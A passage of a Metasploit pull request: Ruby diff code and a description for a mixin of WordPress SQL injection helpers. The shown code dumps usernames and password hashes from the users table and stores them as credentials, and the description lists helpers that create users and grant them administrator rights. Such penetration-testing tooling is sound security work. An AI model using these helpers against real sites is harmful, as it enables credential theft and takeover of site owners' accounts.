+        print_status("{WPSQLi} Custom table prefix detected: '#{prefix}'")
+      end
+
+      prefix
+    end
+
+    # Get users' credentials from the wp_users table
+    #
+    # @param table_prefix [String] The prefix of the WordPress database tables
+    # @param count [Integer] The number of users to retrieve (default: 10)
+    # @return [Array<Array>] Array of arrays containing user login and password hash
+    def wordpress_sqli_get_users_credentials(table_prefix, count = 10)
+      columns = ['user_login', 'user_pass']
+      data = @sqli.dump_table_fields("#{table_prefix}users", columns, '', count)
+
+      table = Rex::Text::Table.new(
+        'Header' => 'wp_users',
+        'Indent' => 4,
+        'Columns' => columns
+      )
+
+      data.each do |user|
+        table << user
+
+        create_credential({
+          workspace_id: myworkspace_id,
+          origin_type: :service,
+          module_fullname: fullname,
+          username: user[0],
+          private_type: :nonreplayable_hash,
+          jtr_format: Metasploit::Framework::Hashes.identify_hash(user[1]),
+          private_data: user[1],
+          service_name: 'WordPress',
+          address: ip,
+          port: datastore['RPORT'],
+          protocol: 'tcp',
+          status: Metasploit::Model::Login::Status::UNTRIED
+        })
+      end
+
+      print_status('{WPSQLi} Dumped user data:')
+      print_line(table.to_s)
+
+      return data
+    end
+  end
+end


### PR DESCRIPTION
Hello Metasploit Team,

This pull request introduces a new mixin, `Msf::Exploit::Remote::HTTP::Wordpress::SQLi`, which provides reusable SQL Injection (SQLi) helper functions specifically designed for WordPress modules in the Metasploit Framework. This idea was proposed by @jvoisin to simplify the development of exploit and auxiliary modules targeting WordPress vulnerabilities by avoiding code duplication and facilitating maintenance.

### Key Features:

- **Dynamic Table Prefix Detection**: The mixin includes a function `wordpress_sqli_identify_table_prefix` that dynamically identifies the WordPress database table prefix, whether it's the default `wp_` or a custom prefix. This ensures compatibility with WordPress installations using custom table prefixes.

- **Prefixed Function Names**: All functions in the mixin are prefixed with `wordpress_sqli_` to clearly indicate their association with the WordPress SQLi mixin and to prevent naming conflicts.

- **Helper Functions**:

  - **`wordpress_sqli_initialize(sqli)`**: Initializes the SQLi instance in the module, making it accessible within the mixin for executing SQL injection queries.

  - **`wordpress_sqli_create_user(username, password, email)`**: Creates a new WordPress user or updates an existing one in the `users` table. The function handles password hashing using MD5 for compatibility with older WordPress versions.

  - **`wordpress_sqli_grant_admin_privileges(username)`**: Grants administrator privileges to the specified user by creating or updating the appropriate entry in the `usermeta` table.

  - **`wordpress_sqli_get_users_credentials(count = 10)`**: Retrieves user login names and password hashes from the `users` table, using the detected table prefix. All functions are dynamic thanks to the prefix detection, allowing them to handle installations with custom prefixes seamlessly.

### Adapting Existing Modules:

I plan to adapt the modules (both exploit and auxiliary) I've created in the following pull requests to use this new mixin:

- https://github.com/rapid7/metasploit-framework/pull/19489 (Done)
- https://github.com/rapid7/metasploit-framework/pull/19488 (Done)
- https://github.com/rapid7/metasploit-framework/pull/19482 (Done)
- https://github.com/rapid7/metasploit-framework/pull/19473 (Done) 
- https://github.com/rapid7/metasploit-framework/pull/19517 (Done)

Integrating this mixin into these modules will prevent code duplication, facilitate maintenance, and improve consistency across modules exploiting WordPress vulnerabilities.

Thank you for your time, and please let me know if you have any questions or need further adjustments.